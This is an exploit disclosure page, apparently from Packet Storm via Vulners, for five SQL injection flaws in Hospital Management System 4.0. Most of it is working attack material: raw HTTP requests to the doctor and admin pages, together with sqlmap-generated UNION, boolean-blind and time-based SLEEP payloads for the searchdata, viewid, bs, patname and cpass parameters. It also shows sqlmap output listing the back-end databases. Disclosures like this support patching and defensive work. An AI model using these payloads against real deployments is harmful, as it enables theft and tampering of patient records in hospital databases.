Lucene search
K

Hospital Management System 4.0 searchdata SQL Injection

🗓️ 02 Jan 2020 00:00:00Reported by FULLSHADEType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 226 Views

Hospital Mgmt System 4.0 SQL Injection Vulnerabilit

Code
`# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection  
# Google Dork: N/A  
# Date: 2020-01-02  
# Exploit Author: FULLSHADE  
# Vendor Homepage: https://phpgurukul.com/  
# Software Link: https://phpgurukul.com/hospital-management-system-in-php/  
# Version: v4.0  
# Tested on: Windows  
# CVE : N/A  
  
# The Hospital Management System 4.0 web application is vulnerable to  
# SQL injection in multiple areas, listed below are 5 of the prominent  
# and easy to exploit areas.  
  
================================ 1 - SQLi ================================  
  
POST /hospital/hospital/hms/doctor/search.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 22  
Origin: https://10.0.0.214  
DNT: 1  
Connection: close  
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
  
searchdata=&search=  
  
?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login.  
  
POST parameter 'searchdata' is vulnerable.  
sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests:  
---  
Parameter: searchdata (POST)  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search=  
---  
[15:49:58] [INFO] testing MySQL  
[15:49:58] [INFO] confirming MySQL  
[15:49:58] [INFO] the back-end DBMS is MySQL  
web application technology: Apache 2.4.41, PHP 7.4.1  
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)  
[15:49:58] [INFO] fetching database names  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
================================ 2 - SQLi ================================  
  
GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n  
sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:  
---  
Parameter: viewid (GET)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause  
Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim  
  
Type: UNION query  
Title: Generic UNION query (NULL) - 11 columns  
Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp  
  
[15:54:21] [INFO] fetching database names  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
Cache-Control: max-age=0  
  
?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login  
  
================================ 3 - SQLi ================================  
  
Parameter: bs (POST)  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit=  
  
?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient  
  
================================ 4 - SQLi ================================  
  
POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 111  
Origin: https://10.0.0.214  
DNT: 1  
Connection: close  
Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5  
Upgrade-Insecure-Requests: 1  
  
patname=  
  
patname parameter is vulnerable to SQLi under the add patient in the doctor login  
  
================================ 5 - SQLi ================================  
  
---  
Parameter: cpass (POST)  
Type: boolean-based blind  
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)  
Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind  
Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123  
---  
available databases [6]:  
[*] hms  
[*] information_schema  
[*] mysql  
[*] performance_schema  
[*] phpmyadmin  
[*] test  
  
POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1  
Host: 10.0.0.214  
User-Agent: Mozilla/5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 38  
Origin: http://10.0.0.214  
DNT: 1  
Connection: close  
Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php  
Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5  
Upgrade-Insecure-Requests: 1  
  
cpass=123&npass=123&cfpass=123&submit=123  
  
the ?cpass parameter is vulnerable to blind SQL injection  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

02 Jan 2020 00:00Current
0.4Low risk
Vulners AI Score0.4
226